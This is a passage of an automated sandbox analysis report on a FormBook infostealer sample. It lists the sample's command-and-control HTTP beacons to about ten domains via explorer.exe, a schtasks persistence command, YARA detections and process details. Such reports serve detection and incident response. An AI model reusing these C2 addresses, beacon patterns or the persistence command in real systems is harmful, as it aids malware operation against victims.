Sep 15, 2021 10:10:50.911007881 CEST	8.8.8.8	192.168.2.3	0x1a3f	No error (0)	www.discomountainkombucha.com		91.195.240.94	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.cherrybunk.life

www.d0berman245.xyz

www.fraktal.media

www.expertexceleratorchallenge.com

www.hellocharmaine.com

www.syzhtr.com

www.tjandamber.com

www.realstylecelebz.com

www.dressmids.com

www.discomountainkombucha.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49780	52.25.92.0	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 10:09:58.335856915 CEST	4134	OUT	GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz HTTP/1.1 Host: www.cherrybunk.life Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 10:09:58.520955086 CEST	4136	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Sep 2021 08:09:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 61 33 61 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 70 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 77 77 77 2e 63 68 65 72 72 79 62 75 6e 6b 2e 6c 69 66 65 20 69 73 20 45 78 70 69 72 65 64 20 6f 72 20 53 75 73 70 65 6e 64 65 64 2e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 09 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 39 5d 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 2e 67 72 61 64 69 65 6e 74 20 7b 0a 09 09 09 66 69 6c 74 65 72 3a 20 6e 6f 6e 65 3b 0a 09 09 7d 0a 09 3c 2f 73 74 79 6c 65 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 21 2d 2d 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 6c 61 63 6b 62 6f 61 72 64 22 3e 2d 2d 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 74 6f 6b 79 6f 31 22 3e 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 66 75 6c 62 6f 78 2e 6a 70 2f 3f 61 64 72 65 66 3d 6e 73 65 78 70 5f 61 64 26 61 72 67 75 6d 65 6e 74 3d 44 4c 48 74 73 72 67 7a 26 64 6d 61 69 3d 61 35 62 35 61 38 30 39 31 36 38 38 38 36 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 63 6c 61 73 73 3d 22 62 6e 72 4c 69 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 66 75 6c 62 6f 78 2e 6a 70 2f 63 6f 6d 6d 6f 6e 2f 69 6d 67 2f 62 6e 72 2f 63 6f 6c 6f 72 66 75 6c 62 6f 78 5f 62 6e 72 30 31 2e 70 6e 67 22 20 61 6c 74 3d 22 e7 94 bb e5 83 8f 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 76 61 6c 69 64 22 3e 0a 09 3c 68 31 3e 0a 09 09 3c 69 6d 67 20 73 72 63 3d 22 69 6d 67 2f 69 6d 67 30 31 2e 70 6e 67 22 20 61 6c 74 3d 22 e7 94 bb e5 83 8f 22 3e 0a 09 09 3c 70 3e e3 83 89 e3 83 a1 e3 82 a4 e3 83 b3 e3 81 8c e7 84 a1 e5 8a b9 e3 81 aa e7 8a b6 e6 85 8b e3 81 a7 e3 81 99 e3 80 82 3c 2f 70 3e 0a 09 3c 2f 68 31 3e 0a 09 3c 64 69 76 3e 0a 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 78 74 30 31 22 3e e3 80 8c 20 3c 73 70 61 6e 3e 77 77 77 2e 63 68 65 72 72 79 62 75 6e 6b 2e 6c 69 66 65 3c 2f 73 70 61 6e 3e 20 e3 80 8d e3 81 ae e3 83 9a e3 83 bc e3 82 b8 e3 81 af e3 80 81 e3 83 89 e3 83 a1 e3 82 a4 e3 83 b3 e3 81 8c e7 84 a1 e5 8a b9 e3 81 aa e7 8a b6 e6 85 8b e3 81 a7 e3 81 99 e3 80 82 3c 62 72 3e e3 82 a6 e3 82 a7 e3 83 96 e3 82 b5 e3 82 a4 e3 83 88 e7 ae a1 e7 90 86 e8 80 85 e3 81 ae e6 96 b9 e3 81 af 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 61 6c 75 65 2d 64 6f 6d 61 69 6e 2e 63 6f 6d 2f 6d 6f 64 61 6c 6c 2e 70 68 70 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e e3 81 93 e3 81 a1 e3 82 89 e3 81 8b e3 82 89 e5 a4 89 e6 9b b4 e3 83 bb e6 9b b4 e6 96 b0 3c 2f 61 3e e3 82 92 e8 a1 8c e3 81 a3 e3 81 a6 e3 81 8f e3 81 a0 e3 Data Ascii: a3a<!doctype html><html lang="jp"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>www.cherrybunk.life is Expired or Suspended.</title><link rel="stylesheet" type="text/css" href="style.css"><meta name="robots" content="noindex" />...[if gte IE 9]><style type="text/css">.gradient {filter: none;}</style><![endif]--></head>...<body class="blackboard">--><body class="tokyo1"><a href="https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886" target="_blank" class="bnrLink" rel="nofollow"><img src="https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png" alt=""></a><div class="invalid"><h1><img src="img/img01.png" alt=""><p></p></h1><div><p class="txt01"> <span>www.cherrybunk.life</span> <br><a href="https://www.value-domain.com/modall.php" target="_blank" rel="nofollow"></a>
Sep 15, 2021 10:09:58.520979881 CEST	4137	IN	Data Raw: 81 95 e3 81 84 e3 80 82 3c 2f 70 3e 0a 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 78 74 30 32 22 3e e3 80 8c 20 77 77 77 2e 63 68 65 72 72 79 62 75 6e 6b 2e 6c 69 66 65 20 e3 80 8d 69 73 20 45 78 70 69 72 65 64 20 6f 72 20 53 75 73 70 65 6e 64 65 64 Data Ascii: </p><p class="txt02"> www.cherrybunk.life is Expired or Suspended. <a href="https://www.value-domain.com/modall.php" target="_blank" rel="nofollow">The WHOIS is here.</a></p></div></div><footer><a href="https://www.value-
Sep 15, 2021 10:09:58.521400928 CEST	4137	IN	Data Raw: 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 0a 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41 2d 34 34 36 39 36 38 36 38 2d 36 27 2c 20 27 61 75 74 6f 27 29 3b 0a 20 20 67 61 28 27 73 65 6e Data Ascii: ytics.com/analytics.js','ga'); ga('create', 'UA-44696868-6', 'auto'); ga('send', 'pageview');</script></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49781	99.83.154.118	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 10:10:03.618793011 CEST	4138	OUT	GET /vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo HTTP/1.1 Host: www.d0berman245.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 10:10:03.777625084 CEST	4138	IN	HTTP/1.1 403 Forbidden Date: Wed, 15 Sep 2021 08:10:03 GMT Content-Type: text/html Content-Length: 146 Connection: close Server: nginx Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49782	34.98.99.30	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 10:10:08.849975109 CEST	4140	OUT	GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB HTTP/1.1 Host: www.fraktal.media Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 10:10:08.965112925 CEST	4141	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 15 Sep 2021 08:10:08 GMT Content-Type: text/html Content-Length: 275 ETag: "6139ed55-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49787	34.98.99.30	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 10:10:14.066011906 CEST	4161	OUT	GET /vuja/?a6PLdH6=QFFty8wvqhCytrBgHARX2ZkDyAOTnUZPmU5cb5PMMJEj0bAx9fBxVhYMw+XdeJtryV9Z&SrK0m=8pbLu8l0SV1lo HTTP/1.1 Host: www.expertexceleratorchallenge.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 10:10:14.181255102 CEST	4162	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 15 Sep 2021 08:10:14 GMT Content-Type: text/html Content-Length: 275 ETag: "6139efab-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49788	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 10:10:19.252830982 CEST	4163	OUT	GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY HTTP/1.1 Host: www.hellocharmaine.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 10:10:19.290005922 CEST	4164	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY Date: Wed, 15 Sep 2021 08:10:19 GMT Content-Length: 172 Connection: close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 65 6c 6c 6f 63 68 61 72 6d 61 69 6e 65 2e 63 6f 6d 2f 76 75 6a 61 2f 3f 53 72 4b 30 6d 3d 38 70 62 4c 75 38 6c 30 53 56 31 6c 6f 26 61 6d 70 3b 61 36 50 4c 64 48 36 3d 48 69 46 32 4a 6d 56 32 6f 77 50 71 38 48 65 76 59 2b 36 50 4c 48 30 6c 33 4b 67 69 44 62 74 66 38 58 4f 6f 4f 4d 58 76 52 58 67 56 44 78 44 4c 78 6a 57 65 62 48 49 39 50 77 34 38 38 76 4d 6b 39 4f 52 59 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY">Moved Permanently</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49789	103.72.144.19	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 10:10:24.818169117 CEST	4165	OUT	GET /vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo HTTP/1.1 Host: www.syzhtr.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 10:10:25.132343054 CEST	4165	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 15 Sep 2021 08:10:24 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49790	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 10:10:30.286042929 CEST	4166	OUT	GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 HTTP/1.1 Host: www.tjandamber.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 10:10:30.401585102 CEST	4166	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 15 Sep 2021 08:10:30 GMT Content-Type: text/html Content-Length: 275 ETag: "6139efab-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49791	99.83.154.118	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 10:10:40.511245966 CEST	4167	OUT	GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 HTTP/1.1 Host: www.realstylecelebz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 10:10:40.680717945 CEST	4168	IN	HTTP/1.1 403 Forbidden Date: Wed, 15 Sep 2021 08:10:40 GMT Content-Type: text/html Content-Length: 146 Connection: close Server: nginx Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49792	34.98.99.30	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 10:10:45.754266024 CEST	4169	OUT	GET /vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo HTTP/1.1 Host: www.dressmids.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 10:10:45.871160984 CEST	4169	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 15 Sep 2021 08:10:45 GMT Content-Type: text/html Content-Length: 275 ETag: "6139ed55-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49793	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2021 10:10:50.931049109 CEST	4170	OUT	GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd HTTP/1.1 Host: www.discomountainkombucha.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Sep 15, 2021 10:10:50.960297108 CEST	4171	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd Date: Wed, 15 Sep 2021 08:10:50 GMT Content-Length: 179 Connection: close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 69 73 63 6f 6d 6f 75 6e 74 61 69 6e 6b 6f 6d 62 75 63 68 61 2e 63 6f 6d 2f 76 75 6a 61 2f 3f 53 72 4b 30 6d 3d 38 70 62 4c 75 38 6c 30 53 56 31 6c 6f 26 61 6d 70 3b 61 36 50 4c 64 48 36 3d 76 48 4b 68 44 66 64 7a 33 51 6a 79 6f 55 75 61 4b 30 66 4b 58 33 6b 36 76 4e 55 64 78 68 4e 30 30 67 44 6c 4a 54 32 68 54 66 58 4e 74 64 6f 42 66 57 57 64 4e 62 48 41 4d 6e 59 33 66 48 6e 6e 37 41 71 64 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd">Moved Permanently</a>.

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: tgamf4XuLa.exe PID: 6056 Parent PID: 852

General

Start time:	10:08:30
Start date:	15/09/2021
Path:	C:\Users\user\Desktop\tgamf4XuLa.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\tgamf4XuLa.exe'
Imagebase:	0x6a0000
File size:	548352 bytes
MD5 hash:	F8146A71DEDC3EEEAA1624D6832C39A4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 5080 Parent PID: 6056

General

Start time:	10:08:34
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'
Imagebase:	0x9f0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4704 Parent PID: 5080

General

Start time:	10:08:35
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: tgamf4XuLa.exe PID: 1956 Parent PID: 6056

General

Start time:	10:08:35
Start date:	15/09/2021
Path:	C:\Users\user\Desktop\tgamf4XuLa.exe
